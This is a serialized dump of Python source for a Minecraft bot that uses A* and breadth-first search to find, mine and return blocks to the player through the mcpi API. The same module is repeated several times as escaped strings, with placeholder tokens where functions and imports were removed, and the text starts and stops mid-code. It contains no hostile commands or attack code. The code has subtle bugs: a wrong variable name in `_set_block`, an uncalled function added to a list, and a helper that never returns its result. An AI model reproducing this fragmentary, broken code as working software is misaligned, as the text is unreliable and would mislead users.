dirs = [_Vec3(0, 2, 0)]\n for dir_ in _adj_dirs():\n dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])\n if self._get_block(self._pos + dir_) in [_AIR, _WATER]:\n dirs.append(dir_ + _Vec3(0, -1, 0))\n rtn = []\n for dir_ in dirs:\n pos = self._pos + dir_\n if self._can_place(pos):\n rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {\n 'exclude': exclude}})\n return rtn\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n\n def _has_blocks_to_place(self, exclude=None):\n \"\"\"Return whether or not the bot can place a block from the\n inventory. If exclude is None, any block can be placed.\"\"\"\n for block_ in self._inventory:\n if block_ != exclude:\n return True\n return False\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n\n def _move(self, pos):\n \"\"\"Move there only.\"\"\"\n self._pos = deepcopy(pos)\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n\n\ndef _return_heuristic(bot, problem):\n \"\"\"Return the return heuristic.\n\n bot is an _ImaginaryBot.\n \"\"\"\n bot_pos = bot.get_pos()\n player_pos = problem.get_player_loc()\n bot_plane_pos = bot.x, bot.z\n y_diff = bot_pos.y - player_pos.y\n drop = _DROP if y_diff > 0 else 1\n y_diff = abs(y_diff)\n drops = _drops(y_diff, drop)\n min_man = float('inf')\n for dir_ in _adj_dirs():\n loc = player_pos + 2 * dir_\n man_dist = _manhattan(bot_plane_pos, (loc.x, loc.z))\n if man_dist < min_man:\n min_man = man_dist\n if man_dist < drops:\n return drops\n return min_man\n\n\ndef _to_my_vec3(vec):\n \"\"\"Return the _Vec3 alternative of the Vec3.\"\"\"\n return _Vec3(vec.x, vec.y, vec.z)\n\n\ndef _player_loc():\n \"\"\"Return the player's location.\"\"\"\n return _to_my_vec3(_get_mc().player.getTilePos())\n\n\ndef _adj_dirs():\n \"\"\"Return the adjacent directions.\"\"\"\n return [_Vec3(1, 0, 0), _Vec3(-1, 0, 0), _Vec3(0, 0, 1), _Vec3(0, 0, -1)]\n\n\ndef _all_dirs():\n \"\"\"Return all adjacent directions.\"\"\"\n return _adj_dirs() + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]\n\n\ndef _manhattan(pos1, pos2):\n \"\"\"Return the manhattan distance. pos1 and pos2 should be iterable.\"\"\"\n return sum(abs(val1 - val2) for val1, val2 in zip(pos1, pos2))\n\n\n<function token>\n\n\ndef _key_vals(dict_):\n \"\"\"Return a list of key-val tuples.\"\"\"\n return [(key, val) for key, val in dict_.iteritems()]\n", "<docstring token>\n<import token>\n<assignment token>\n\n\nclass _Vec3(Vec3):\n \"\"\"A Vec3 that is hashable. Everything in this program should use this\n class.\"\"\"\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash((self.x, self.y, self.z))\n\n def clone(self):\n \"\"\"Return a clone.\"\"\"\n return _Vec3(self.x, self.y, self.z)\n\n\nclass _GenericBot:\n \"\"\"A generic bot.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n\n def take_action(self, action):\n \"\"\"Take the action (acquired from _get_legal_actions).\"\"\"\n getattr(self, action['func'])(*action.get('args', ()), **action.get\n ('kwargs', {}))\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n\n def get_pos(self):\n \"\"\"Return the position.\"\"\"\n return deepcopy(self._pos)\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n\n def _add_to_inv(self, block_):\n \"\"\"Add the block to the inventory.\"\"\"\n if block_ in self._inventory:\n self._inventory[block_] += 1\n else:\n self._inventory[block_] = 1\n\n def _move_up(self, exclude=None):\n \"\"\"Move and place a block below.\n\n If exclude is not None, place a block that is not 'exclude'.\n \"\"\"\n self._move(self._pos + _Vec3(0, 1, 0))\n self._place(self._pos + _Vec3(0, -1, 0), exclude)\n\n def _mine(self, loc):\n \"\"\"Mine the block.\"\"\"\n block_ = self._get_block(loc)\n self._add_to_inv(block_)\n self._set_block(loc, _AIR)\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n\n def _get_placement_actions(self, exclude=None):\n \"\"\"Return a list of legal actions that only involve placing a block\n from the inventory.\n\n exclude is a block id. It is the block that should not be placed. If None,\n any block can be placed.\"\"\"\n if not self._has_blocks_to_place(exclude=exclude):\n return []\n dirs = [_Vec3(0, 2, 0)]\n for dir_ in _adj_dirs():\n dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])\n if self._get_block(self._pos + dir_) in [_AIR, _WATER]:\n dirs.append(dir_ + _Vec3(0, -1, 0))\n rtn = []\n for dir_ in dirs:\n pos = self._pos + dir_\n if self._can_place(pos):\n rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {\n 'exclude': exclude}})\n return rtn\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n\n def _has_blocks_to_place(self, exclude=None):\n \"\"\"Return whether or not the bot can place a block from the\n inventory. If exclude is None, any block can be placed.\"\"\"\n for block_ in self._inventory:\n if block_ != exclude:\n return True\n return False\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n\n def _move(self, pos):\n \"\"\"Move there only.\"\"\"\n self._pos = deepcopy(pos)\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n\n\ndef _return_heuristic(bot, problem):\n \"\"\"Return the return heuristic.\n\n bot is an _ImaginaryBot.\n \"\"\"\n bot_pos = bot.get_pos()\n player_pos = problem.get_player_loc()\n bot_plane_pos = bot.x, bot.z\n y_diff = bot_pos.y - player_pos.y\n drop = _DROP if y_diff > 0 else 1\n y_diff = abs(y_diff)\n drops = _drops(y_diff, drop)\n min_man = float('inf')\n for dir_ in _adj_dirs():\n loc = player_pos + 2 * dir_\n man_dist = _manhattan(bot_plane_pos, (loc.x, loc.z))\n if man_dist < min_man:\n min_man = man_dist\n if man_dist < drops:\n return drops\n return min_man\n\n\ndef _to_my_vec3(vec):\n \"\"\"Return the _Vec3 alternative of the Vec3.\"\"\"\n return _Vec3(vec.x, vec.y, vec.z)\n\n\ndef _player_loc():\n \"\"\"Return the player's location.\"\"\"\n return _to_my_vec3(_get_mc().player.getTilePos())\n\n\ndef _adj_dirs():\n \"\"\"Return the adjacent directions.\"\"\"\n return [_Vec3(1, 0, 0), _Vec3(-1, 0, 0), _Vec3(0, 0, 1), _Vec3(0, 0, -1)]\n\n\n<function token>\n\n\ndef _manhattan(pos1, pos2):\n \"\"\"Return the manhattan distance. pos1 and pos2 should be iterable.\"\"\"\n return sum(abs(val1 - val2) for val1, val2 in zip(pos1, pos2))\n\n\n<function token>\n\n\ndef _key_vals(dict_):\n \"\"\"Return a list of key-val tuples.\"\"\"\n return [(key, val) for key, val in dict_.iteritems()]\n", "<docstring token>\n<import token>\n<assignment token>\n\n\nclass _Vec3(Vec3):\n \"\"\"A Vec3 that is hashable. Everything in this program should use this\n class.\"\"\"\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash((self.x, self.y, self.z))\n\n def clone(self):\n \"\"\"Return a clone.\"\"\"\n return _Vec3(self.x, self.y, self.z)\n\n\nclass _GenericBot:\n \"\"\"A generic bot.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n\n def take_action(self, action):\n \"\"\"Take the action (acquired from _get_legal_actions).\"\"\"\n getattr(self, action['func'])(*action.get('args', ()), **action.get\n ('kwargs', {}))\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n\n def get_pos(self):\n \"\"\"Return the position.\"\"\"\n return deepcopy(self._pos)\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n\n def _add_to_inv(self, block_):\n \"\"\"Add the block to the inventory.\"\"\"\n if block_ in self._inventory:\n self._inventory[block_] += 1\n else:\n self._inventory[block_] = 1\n\n def _move_up(self, exclude=None):\n \"\"\"Move and place a block below.\n\n If exclude is not None, place a block that is not 'exclude'.\n \"\"\"\n self._move(self._pos + _Vec3(0, 1, 0))\n self._place(self._pos + _Vec3(0, -1, 0), exclude)\n\n def _mine(self, loc):\n \"\"\"Mine the block.\"\"\"\n block_ = self._get_block(loc)\n self._add_to_inv(block_)\n self._set_block(loc, _AIR)\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n\n def _get_placement_actions(self, exclude=None):\n \"\"\"Return a list of legal actions that only involve placing a block\n from the inventory.\n\n exclude is a block id. It is the block that should not be placed. If None,\n any block can be placed.\"\"\"\n if not self._has_blocks_to_place(exclude=exclude):\n return []\n dirs = [_Vec3(0, 2, 0)]\n for dir_ in _adj_dirs():\n dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])\n if self._get_block(self._pos + dir_) in [_AIR, _WATER]:\n dirs.append(dir_ + _Vec3(0, -1, 0))\n rtn = []\n for dir_ in dirs:\n pos = self._pos + dir_\n if self._can_place(pos):\n rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {\n 'exclude': exclude}})\n return rtn\n\n def _can_place(self, 